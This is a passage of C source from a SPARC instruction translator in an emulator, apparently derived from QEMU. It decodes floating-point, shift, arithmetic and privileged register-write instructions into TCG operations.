0x4a: /* fmuld */ CHECK_FPU_FEATURE(dc, FMUL); gen_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmuld); break; case 0x4b: /* fmulq */ CHECK_FPU_FEATURE(dc, FLOAT128); CHECK_FPU_FEATURE(dc, FMUL); gen_fop_QQQ(dc, rd, rs1, rs2, gen_helper_fmulq); break; case 0x4d: /* fdivs */ gen_fop_FFF(dc, rd, rs1, rs2, gen_helper_fdivs); break; case 0x4e: /* fdivd */ gen_fop_DDD(dc, rd, rs1, rs2, gen_helper_fdivd); break; case 0x4f: /* fdivq */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_fop_QQQ(dc, rd, rs1, rs2, gen_helper_fdivq); break; case 0x69: /* fsmuld */ CHECK_FPU_FEATURE(dc, FSMULD); gen_fop_DFF(dc, rd, rs1, rs2, gen_helper_fsmuld); break; case 0x6e: /* fdmulq */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_fop_QDD(dc, rd, rs1, rs2, gen_helper_fdmulq); break; case 0xc4: /* fitos */ gen_fop_FF(dc, rd, rs2, gen_helper_fitos); break; case 0xc6: /* fdtos */ gen_fop_FD(dc, rd, rs2, gen_helper_fdtos); break; case 0xc7: /* fqtos */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_fop_FQ(dc, rd, rs2, gen_helper_fqtos); break; case 0xc8: /* fitod */ gen_ne_fop_DF(dc, rd, rs2, gen_helper_fitod); break; case 0xc9: /* fstod */ gen_ne_fop_DF(dc, rd, rs2, gen_helper_fstod); break; case 0xcb: /* fqtod */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_fop_DQ(dc, rd, rs2, gen_helper_fqtod); break; case 0xcc: /* fitoq */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_ne_fop_QF(dc, rd, rs2, gen_helper_fitoq); break; case 0xcd: /* fstoq */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_ne_fop_QF(dc, rd, rs2, gen_helper_fstoq); break; case 0xce: /* fdtoq */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_ne_fop_QD(dc, rd, rs2, gen_helper_fdtoq); break; case 0xd1: /* fstoi */ gen_fop_FF(dc, rd, rs2, gen_helper_fstoi); break; case 0xd2: /* fdtoi */ gen_fop_FD(dc, rd, rs2, gen_helper_fdtoi); break; case 0xd3: /* fqtoi */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_fop_FQ(dc, rd, rs2, gen_helper_fqtoi); break; #ifdef TARGET_SPARC64 case 0x2: /* V9 fmovd */ cpu_src1_64 = gen_load_fpr_D(dc, rs2); gen_store_fpr_D(dc, rd, cpu_src1_64); break; case 0x3: /* V9 fmovq */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_move_Q(dc, rd, rs2); break; case 0x6: /* V9 fnegd */ gen_ne_fop_DD(dc, rd, rs2, gen_helper_fnegd); break; case 0x7: /* V9 fnegq */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_ne_fop_QQ(dc, rd, rs2, gen_helper_fnegq); break; case 0xa: /* V9 fabsd */ gen_ne_fop_DD(dc, rd, rs2, gen_helper_fabsd); break; case 0xb: /* V9 fabsq */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_ne_fop_QQ(dc, rd, rs2, gen_helper_fabsq); break; case 0x81: /* V9 fstox */ gen_fop_DF(dc, rd, rs2, gen_helper_fstox); break; case 0x82: /* V9 fdtox */ gen_fop_DD(dc, rd, rs2, gen_helper_fdtox); break; case 0x83: /* V9 fqtox */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_fop_DQ(dc, rd, rs2, gen_helper_fqtox); break; case 0x84: /* V9 fxtos */ gen_fop_FD(dc, rd, rs2, gen_helper_fxtos); break; case 0x88: /* V9 fxtod */ gen_fop_DD(dc, rd, rs2, gen_helper_fxtod); break; case 0x8c: /* V9 fxtoq */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_ne_fop_QD(dc, rd, rs2, gen_helper_fxtoq); break; #endif default: goto illegal_insn; } } else if (xop == 0x35) { /* FPU Operations */ #ifdef TARGET_SPARC64 int cond; #endif if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } gen_op_clear_ieee_excp_and_FTT(tcg_ctx); rs1 = GET_FIELD(insn, 13, 17); rs2 = GET_FIELD(insn, 27, 31); xop = GET_FIELD(insn, 18, 26); #ifdef TARGET_SPARC64 #define FMOVR(sz) \ do { \ DisasCompare cmp; \ cond = GET_FIELD_SP(insn, 10, 12); \ cpu_src1 = get_src1(dc, insn); \ gen_compare_reg(tcg_ctx, &cmp, cond, cpu_src1); \ gen_fmov##sz(dc, &cmp, rd, rs2); \ free_compare(tcg_ctx, &cmp); \ } while (0) if ((xop & 0x11f) == 0x005) { /* V9 fmovsr */ FMOVR(s); break; } else if ((xop & 0x11f) == 0x006) { // V9 fmovdr FMOVR(d); break; } else if ((xop & 0x11f) == 0x007) { // V9 fmovqr CHECK_FPU_FEATURE(dc, FLOAT128); FMOVR(q); break; } #undef FMOVR #endif switch (xop) { #ifdef TARGET_SPARC64 #define FMOVCC(fcc, sz) \ do { \ DisasCompare cmp; \ cond = GET_FIELD_SP(insn, 14, 17); \ gen_fcompare(tcg_ctx, &cmp, fcc, cond); \ gen_fmov##sz(dc, &cmp, rd, rs2); \ free_compare(tcg_ctx, &cmp); \ } while (0) case 0x001: /* V9 fmovscc %fcc0 */ FMOVCC(0, s); break; case 0x002: /* V9 fmovdcc %fcc0 */ FMOVCC(0, d); break; case 0x003: /* V9 fmovqcc %fcc0 */ CHECK_FPU_FEATURE(dc, FLOAT128); FMOVCC(0, q); break; case 0x041: /* V9 fmovscc %fcc1 */ FMOVCC(1, s); break; case 0x042: /* V9 fmovdcc %fcc1 */ FMOVCC(1, d); break; case 0x043: /* V9 fmovqcc %fcc1 */ CHECK_FPU_FEATURE(dc, FLOAT128); FMOVCC(1, q); break; case 0x081: /* V9 fmovscc %fcc2 */ FMOVCC(2, s); break; case 0x082: /* V9 fmovdcc %fcc2 */ FMOVCC(2, d); break; case 0x083: /* V9 fmovqcc %fcc2 */ CHECK_FPU_FEATURE(dc, FLOAT128); FMOVCC(2, q); break; case 0x0c1: /* V9 fmovscc %fcc3 */ FMOVCC(3, s); break; case 0x0c2: /* V9 fmovdcc %fcc3 */ FMOVCC(3, d); break; case 0x0c3: /* V9 fmovqcc %fcc3 */ CHECK_FPU_FEATURE(dc, FLOAT128); FMOVCC(3, q); break; #undef FMOVCC #define FMOVCC(xcc, sz) \ do { \ DisasCompare cmp; \ cond = GET_FIELD_SP(insn, 14, 17); \ gen_compare(&cmp, xcc, cond, dc); \ gen_fmov##sz(dc, &cmp, rd, rs2); \ free_compare(tcg_ctx, &cmp); \ } while (0) case 0x101: /* V9 fmovscc %icc */ FMOVCC(0, s); break; case 0x102: /* V9 fmovdcc %icc */ FMOVCC(0, d); break; case 0x103: /* V9 fmovqcc %icc */ CHECK_FPU_FEATURE(dc, FLOAT128); FMOVCC(0, q); break; case 0x181: /* V9 fmovscc %xcc */ FMOVCC(1, s); break; case 0x182: /* V9 fmovdcc %xcc */ FMOVCC(1, d); break; case 0x183: /* V9 fmovqcc %xcc */ CHECK_FPU_FEATURE(dc, FLOAT128); FMOVCC(1, q); break; #undef FMOVCC #endif case 0x51: /* fcmps, V9 %fcc */ cpu_src1_32 = gen_load_fpr_F(dc, rs1); cpu_src2_32 = gen_load_fpr_F(dc, rs2); gen_op_fcmps(tcg_ctx, rd & 3, cpu_src1_32, cpu_src2_32); break; case 0x52: /* fcmpd, V9 %fcc */ cpu_src1_64 = gen_load_fpr_D(dc, rs1); cpu_src2_64 = gen_load_fpr_D(dc, rs2); gen_op_fcmpd(tcg_ctx, rd & 3, cpu_src1_64, cpu_src2_64); break; case 0x53: /* fcmpq, V9 %fcc */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_op_load_fpr_QT0(tcg_ctx, QFPREG(rs1)); gen_op_load_fpr_QT1(tcg_ctx, QFPREG(rs2)); gen_op_fcmpq(tcg_ctx, rd & 3); break; case 0x55: /* fcmpes, V9 %fcc */ cpu_src1_32 = gen_load_fpr_F(dc, rs1); cpu_src2_32 = gen_load_fpr_F(dc, rs2); gen_op_fcmpes(tcg_ctx, rd & 3, cpu_src1_32, cpu_src2_32); break; case 0x56: /* fcmped, V9 %fcc */ cpu_src1_64 = gen_load_fpr_D(dc, rs1); cpu_src2_64 = gen_load_fpr_D(dc, rs2); gen_op_fcmped(tcg_ctx, rd & 3, cpu_src1_64, cpu_src2_64); break; case 0x57: /* fcmpeq, V9 %fcc */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_op_load_fpr_QT0(tcg_ctx, QFPREG(rs1)); gen_op_load_fpr_QT1(tcg_ctx, QFPREG(rs2)); gen_op_fcmpeq(tcg_ctx, rd & 3); break; default: goto illegal_insn; } } else if (xop == 0x2) { TCGv dst = gen_dest_gpr(dc, rd); rs1 = GET_FIELD(insn, 13, 17); if (rs1 == 0) { /* clr/mov shortcut : or %g0, x, y -> mov x, y */ if (IS_IMM) { /* immediate */ simm = GET_FIELDs(insn, 19, 31); tcg_gen_movi_tl(tcg_ctx, dst, simm); gen_store_gpr(dc, rd, dst); } else { /* register */ rs2 = GET_FIELD(insn, 27, 31); if (rs2 == 0) { tcg_gen_movi_tl(tcg_ctx, dst, 0); gen_store_gpr(dc, rd, dst); } else { cpu_src2 = gen_load_gpr(dc, rs2); gen_store_gpr(dc, rd, cpu_src2); } } } else { cpu_src1 = get_src1(dc, insn); if (IS_IMM) { /* immediate */ simm = GET_FIELDs(insn, 19, 31); tcg_gen_ori_tl(tcg_ctx, dst, cpu_src1, simm); gen_store_gpr(dc, rd, dst); } else { /* register */ rs2 = GET_FIELD(insn, 27, 31); if (rs2 == 0) { /* mov shortcut: or x, %g0, y -> mov x, y */ gen_store_gpr(dc, rd, cpu_src1); } else { cpu_src2 = gen_load_gpr(dc, rs2); tcg_gen_or_tl(tcg_ctx, dst, cpu_src1, cpu_src2); gen_store_gpr(dc, rd, dst); } } } #ifdef TARGET_SPARC64 } else if (xop == 0x25) { /* sll, V9 sllx */ cpu_src1 = get_src1(dc, insn); if (IS_IMM) { /* immediate */ simm = GET_FIELDs(insn, 20, 31); if (insn & (1 << 12)) { tcg_gen_shli_i64(tcg_ctx, cpu_dst, cpu_src1, simm & 0x3f); } else { tcg_gen_shli_i64(tcg_ctx, cpu_dst, cpu_src1, simm & 0x1f); } } else { /* register */ rs2 = GET_FIELD(insn, 27, 31); cpu_src2 = gen_load_gpr(dc, rs2); cpu_tmp0 = get_temp_tl(dc); if (insn & (1 << 12)) { tcg_gen_andi_i64(tcg_ctx, cpu_tmp0, cpu_src2, 0x3f); } else { tcg_gen_andi_i64(tcg_ctx, cpu_tmp0, cpu_src2, 0x1f); } tcg_gen_shl_i64(tcg_ctx, cpu_dst, cpu_src1, cpu_tmp0); } gen_store_gpr(dc, rd, cpu_dst); } else if (xop == 0x26) { /* srl, V9 srlx */ cpu_src1 = get_src1(dc, insn); if (IS_IMM) { /* immediate */ simm = GET_FIELDs(insn, 20, 31); if (insn & (1 << 12)) { tcg_gen_shri_i64(tcg_ctx, cpu_dst, cpu_src1, simm & 0x3f); } else { tcg_gen_andi_i64(tcg_ctx, cpu_dst, cpu_src1, 0xffffffffULL); tcg_gen_shri_i64(tcg_ctx, cpu_dst, cpu_dst, simm & 0x1f); } } else { /* register */ rs2 = GET_FIELD(insn, 27, 31); cpu_src2 = gen_load_gpr(dc, rs2); cpu_tmp0 = get_temp_tl(dc); if (insn & (1 << 12)) { tcg_gen_andi_i64(tcg_ctx, cpu_tmp0, cpu_src2, 0x3f); tcg_gen_shr_i64(tcg_ctx, cpu_dst, cpu_src1, cpu_tmp0); } else { tcg_gen_andi_i64(tcg_ctx, cpu_tmp0, cpu_src2, 0x1f); tcg_gen_andi_i64(tcg_ctx, cpu_dst, cpu_src1, 0xffffffffULL); tcg_gen_shr_i64(tcg_ctx, cpu_dst, cpu_dst, cpu_tmp0); } } gen_store_gpr(dc, rd, cpu_dst); } else if (xop == 0x27) { /* sra, V9 srax */ cpu_src1 = get_src1(dc, insn); if (IS_IMM) { /* immediate */ simm = GET_FIELDs(insn, 20, 31); if (insn & (1 << 12)) { tcg_gen_sari_i64(tcg_ctx, cpu_dst, cpu_src1, simm & 0x3f); } else { tcg_gen_ext32s_i64(tcg_ctx, cpu_dst, cpu_src1); tcg_gen_sari_i64(tcg_ctx, cpu_dst, cpu_dst, simm & 0x1f); } } else { /* register */ rs2 = GET_FIELD(insn, 27, 31); cpu_src2 = gen_load_gpr(dc, rs2); cpu_tmp0 = get_temp_tl(dc); if (insn & (1 << 12)) { tcg_gen_andi_i64(tcg_ctx, cpu_tmp0, cpu_src2, 0x3f); tcg_gen_sar_i64(tcg_ctx, cpu_dst, cpu_src1, cpu_tmp0); } else { tcg_gen_andi_i64(tcg_ctx, cpu_tmp0, cpu_src2, 0x1f); tcg_gen_ext32s_i64(tcg_ctx, cpu_dst, cpu_src1); tcg_gen_sar_i64(tcg_ctx, cpu_dst, cpu_dst, cpu_tmp0); } } gen_store_gpr(dc, rd, cpu_dst); #endif } else if (xop < 0x36) { if (xop < 0x20) { cpu_src1 = get_src1(dc, insn); cpu_src2 = get_src2(dc, insn); switch (xop & ~0x10) { case 0x0: /* add */ if (xop & 0x10) { gen_op_add_cc(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_ADD); dc->cc_op = CC_OP_ADD; } else { tcg_gen_add_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); } break; case 0x1: /* and */ tcg_gen_and_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); if (xop & 0x10) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, cpu_dst); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); dc->cc_op = CC_OP_LOGIC; } break; case 0x2: /* or */ tcg_gen_or_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); if (xop & 0x10) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, cpu_dst); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); dc->cc_op = CC_OP_LOGIC; } break; case 0x3: /* xor */ tcg_gen_xor_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); if (xop & 0x10) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, cpu_dst); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); dc->cc_op = CC_OP_LOGIC; } break; case 0x4: /* sub */ if (xop & 0x10) { gen_op_sub_cc(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_SUB); dc->cc_op = CC_OP_SUB; } else { tcg_gen_sub_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); } break; case 0x5: /* andn */ tcg_gen_andc_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); if (xop & 0x10) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, cpu_dst); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); dc->cc_op = CC_OP_LOGIC; } break; case 0x6: /* orn */ tcg_gen_orc_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); if (xop & 0x10) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, cpu_dst); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); dc->cc_op = CC_OP_LOGIC; } break; case 0x7: /* xorn */ tcg_gen_eqv_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); if (xop & 0x10) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, cpu_dst); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); dc->cc_op = CC_OP_LOGIC; } break; case 0x8: /* addx, V9 addc */ gen_op_addx_int(dc, cpu_dst, cpu_src1, cpu_src2, (xop & 0x10)); break; #ifdef TARGET_SPARC64 case 0x9: /* V9 mulx */ tcg_gen_mul_i64(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); break; #endif case 0xa: /* umul */ CHECK_IU_FEATURE(dc, MUL); gen_op_umul(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); if (xop & 0x10) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, cpu_dst); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); dc->cc_op = CC_OP_LOGIC; } break; case 0xb: /* smul */ CHECK_IU_FEATURE(dc, MUL); gen_op_smul(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); if (xop & 0x10) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, cpu_dst); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); dc->cc_op = CC_OP_LOGIC; } break; case 0xc: /* subx, V9 subc */ gen_op_subx_int(dc, cpu_dst, cpu_src1, cpu_src2, (xop & 0x10)); break; #ifdef TARGET_SPARC64 case 0xd: /* V9 udivx */ gen_helper_udivx(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, cpu_src2); break; #endif case 0xe: /* udiv */ CHECK_IU_FEATURE(dc, DIV); if (xop & 0x10) { gen_helper_udiv_cc(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, cpu_src2); dc->cc_op = CC_OP_DIV; } else { gen_helper_udiv(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, cpu_src2); } break; case 0xf: /* sdiv */ CHECK_IU_FEATURE(dc, DIV); if (xop & 0x10) { gen_helper_sdiv_cc(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, cpu_src2); dc->cc_op = CC_OP_DIV; } else { gen_helper_sdiv(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, cpu_src2); } break; default: goto illegal_insn; } gen_store_gpr(dc, rd, cpu_dst); } else { cpu_src1 = get_src1(dc, insn); cpu_src2 = get_src2(dc, insn); switch (xop) { case 0x20: /* taddcc */ gen_op_add_cc(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); gen_store_gpr(dc, rd, cpu_dst); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_TADD); dc->cc_op = CC_OP_TADD; break; case 0x21: /* tsubcc */ gen_op_sub_cc(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); gen_store_gpr(dc, rd, cpu_dst); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_TSUB); dc->cc_op = CC_OP_TSUB; break; case 0x22: /* taddcctv */ gen_helper_taddcctv(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, cpu_src2); gen_store_gpr(dc, rd, cpu_dst); dc->cc_op = CC_OP_TADDTV; break; case 0x23: /* tsubcctv */ gen_helper_tsubcctv(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, cpu_src2); gen_store_gpr(dc, rd, cpu_dst); dc->cc_op = CC_OP_TSUBTV; break; case 0x24: /* mulscc */ update_psr(dc); gen_op_mulscc(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); gen_store_gpr(dc, rd, cpu_dst); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_ADD); dc->cc_op = CC_OP_ADD; break; #ifndef TARGET_SPARC64 case 0x25: /* sll */ if (IS_IMM) { /* immediate */ simm = GET_FIELDs(insn, 20, 31); tcg_gen_shli_tl(tcg_ctx, cpu_dst, cpu_src1, simm & 0x1f); } else { /* register */ cpu_tmp0 = get_temp_tl(dc); tcg_gen_andi_tl(tcg_ctx, cpu_tmp0, cpu_src2, 0x1f); tcg_gen_shl_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_tmp0); } gen_store_gpr(dc, rd, cpu_dst); break; case 0x26: /* srl */ if (IS_IMM) { /* immediate */ simm = GET_FIELDs(insn, 20, 31); tcg_gen_shri_tl(tcg_ctx, cpu_dst, cpu_src1, simm & 0x1f); } else { /* register */ cpu_tmp0 = get_temp_tl(dc); tcg_gen_andi_tl(tcg_ctx, cpu_tmp0, cpu_src2, 0x1f); tcg_gen_shr_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_tmp0); } gen_store_gpr(dc, rd, cpu_dst); break; case 0x27: /* sra */ if (IS_IMM) { /* immediate */ simm = GET_FIELDs(insn, 20, 31); tcg_gen_sari_tl(tcg_ctx, cpu_dst, cpu_src1, simm & 0x1f); } else { /* register */ cpu_tmp0 = get_temp_tl(dc); tcg_gen_andi_tl(tcg_ctx, cpu_tmp0, cpu_src2, 0x1f); tcg_gen_sar_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_tmp0); } gen_store_gpr(dc, rd, cpu_dst); break; #endif case 0x30: { cpu_tmp0 = get_temp_tl(dc); switch(rd) { case 0: /* wry */ tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_y, cpu_tmp0, 0xffffffff); break; #ifndef TARGET_SPARC64 case 0x01: /* undefined in the SPARCv8 manual, nop on the microSPARC II */ case 0x02: case 0x03: case 0x04: case 0x05: case 0x06: case 0x07: case 0x08: case 0x09: case 0x0a: case 0x0b: case 0x0c: case 0x0d: case 0x0e: case 0x0f: case 0x10: /* implementation-dependent in the SPARCv8 manual, nop on the microSPARC II */ case 0x11: case 0x12: case 0x13: case 0x14: case 0x15: case 0x16: case 0x17: case 0x18: case 0x19: case 0x1a: case 0x1b: case 0x1c: case 0x1d: case 0x1e: case 0x1f: if ((rd == 0x13) && (dc->def->features & CPU_FEATURE_POWERDOWN)) { /* LEON3 power-down */ save_state(dc); gen_helper_power_down(tcg_ctx, tcg_ctx->cpu_env); } break; #else case 0x2: /* V9 wrccr */ tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); gen_helper_wrccr(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_FLAGS); dc->cc_op = CC_OP_FLAGS; break; case 0x3: /* V9 wrasi */ tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); tcg_gen_andi_tl(tcg_ctx, cpu_tmp0, cpu_tmp0, 0xff); tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, asi)); /* End TB to notice changed ASI. */ save_state(dc); gen_op_next_insn(tcg_ctx); tcg_gen_exit_tb(tcg_ctx, NULL, 0); dc->base.is_jmp = DISAS_NORETURN; break; case 0x6: /* V9 wrfprs */ tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); tcg_gen_trunc_tl_i32(tcg_ctx, tcg_ctx->cpu_fprs, cpu_tmp0); dc->fprs_dirty = 0; save_state(dc); gen_op_next_insn(tcg_ctx); tcg_gen_exit_tb(tcg_ctx, NULL, 0); dc->base.is_jmp = DISAS_NORETURN; break; case 0xf: /* V9 sir, nop if user */ if (supervisor(dc)) { ; // XXX } break; case 0x13: /* Graphics Status */ if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_gsr, cpu_src1, cpu_src2); break; case 0x14: /* Softint set */ if (!supervisor(dc)) goto illegal_insn; tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); gen_helper_set_softint(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); break; case 0x15: /* Softint clear */ if (!supervisor(dc)) goto illegal_insn; tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); gen_helper_clear_softint(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); break; case 0x16: /* Softint write */ if (!supervisor(dc)) goto illegal_insn; tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); gen_helper_write_softint(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); break; case 0x17: /* Tick compare */ if (!supervisor(dc)) goto illegal_insn; { TCGv_ptr r_tickptr; tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_tick_cmpr, cpu_src1, cpu_src2); r_tickptr = tcg_temp_new_ptr(tcg_ctx); tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, offsetof(CPUSPARCState, tick)); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_start(); } gen_helper_tick_set_limit(tcg_ctx, r_tickptr, tcg_ctx->cpu_tick_cmpr); tcg_temp_free_ptr(tcg_ctx, r_tickptr); /* End TB to handle timer interrupt */ dc->base.is_jmp = DISAS_EXIT; } break; case 0x18: /* System tick */ if (!supervisor(dc)) goto illegal_insn; { TCGv_ptr r_tickptr; tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); r_tickptr = tcg_temp_new_ptr(tcg_ctx); tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, offsetof(CPUSPARCState, stick)); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_start(); } gen_helper_tick_set_count(tcg_ctx, r_tickptr, cpu_tmp0); tcg_temp_free_ptr(tcg_ctx, r_tickptr); /* End TB to handle timer interrupt */ dc->base.is_jmp = DISAS_EXIT; } break; case 0x19: /* System tick compare */ if (!supervisor(dc)) goto illegal_insn; { TCGv_ptr r_tickptr; tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_stick_cmpr, cpu_src1, cpu_src2); r_tickptr = tcg_temp_new_ptr(tcg_ctx); tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, offsetof(CPUSPARCState, stick)); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_start(); } gen_helper_tick_set_limit(tcg_ctx, r_tickptr, tcg_ctx->cpu_stick_cmpr); tcg_temp_free_ptr(tcg_ctx, r_tickptr); /* End TB to handle timer interrupt */ dc->base.is_jmp = DISAS_EXIT; } break; case 0x10: /* Performance Control */ case 0x11: /* Performance Instrumentation Counter */ case 0x12: /* Dispatch Control */ #endif default: goto illegal_insn; } } break; case 0x31: /* wrpsr, V9 saved, restored */ { if (!supervisor(dc)) goto priv_insn; #ifdef TARGET_SPARC64 switch (rd) { case 0: gen_helper_saved(tcg_ctx, tcg_ctx->cpu_env); break; case 1: gen_helper_restored(tcg_ctx, tcg_ctx->cpu_env); break; case 2: /* UA2005 allclean */ case 3: /* UA2005 otherw */ case 4: /* UA2005 normalw */ case 5: /* UA2005 invalw */ // XXX default: goto illegal_insn; } #else cpu_tmp0 = get_temp_tl(dc); tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); gen_helper_wrpsr(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_FLAGS); dc->cc_op = CC_OP_FLAGS; save_state(dc); gen_op_next_insn(tcg_ctx); tcg_gen_exit_tb(tcg_ctx, NULL, 0); dc->base.is_jmp = DISAS_NORETURN; #endif } break; case 0x32: /* wrwim, V9 wrpr */ { if (!supervisor(dc)) goto priv_insn; cpu_tmp0 = get_temp_tl(dc); tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); #ifdef TARGET_SPARC64 switch (rd) { case 0: // tpc { TCGv_ptr r_tsptr; r_tsptr = tcg_temp_new_ptr(tcg_ctx); gen_load_trap_state_at_tl(tcg_ctx, r_tsptr, tcg_ctx->cpu_env); tcg_gen_st_tl(tcg_ctx, cpu_tmp0, r_tsptr, offsetof(trap_state, tpc)); tcg_temp_free_ptr(tcg_ctx, r_tsptr); } break; case 1: // tnpc { TCGv_ptr r_tsptr; r_tsptr = tcg_temp_new_ptr(tcg_ctx); gen_load_trap_state_at_tl(tcg_ctx, r_tsptr, tcg_ctx->cpu_env); tcg_gen_st_tl(tcg_ctx, cpu_tmp0, r_tsptr, offsetof(trap_state, tnpc)); tcg_temp_free_ptr(tcg_ctx, r_tsptr); } break; case 2: // tstate { TCGv_ptr r_tsptr; r_tsptr = tcg_temp_new_ptr(tcg_ctx); gen_load_trap_state_at_tl(tcg_ctx, r_tsptr, tcg_ctx->cpu_env); tcg_gen_st_tl(tcg_ctx, cpu_tmp0, r_tsptr, offsetof(trap_state, tstate)); tcg_temp_free_ptr(tcg_ctx, r_tsptr); } break; case 3: // tt { TCGv_ptr r_tsptr; r_tsptr = tcg_temp_new_ptr(tcg_ctx); gen_load_trap_state_at_tl(tcg_ctx, r_tsptr, tcg_ctx->cpu_env); tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, r_tsptr, offsetof(trap_state, tt)); tcg_temp_free_ptr(tcg_ctx, r_tsptr); } break; case 4: // tick { TCGv_ptr r_tickptr; r_tickptr = tcg_temp_new_ptr(tcg_ctx); tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, offsetof(CPUSPARCState, tick)); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_start(); } gen_helper_tick_set_count(tcg_ctx, r_tickptr, cpu_tmp0); 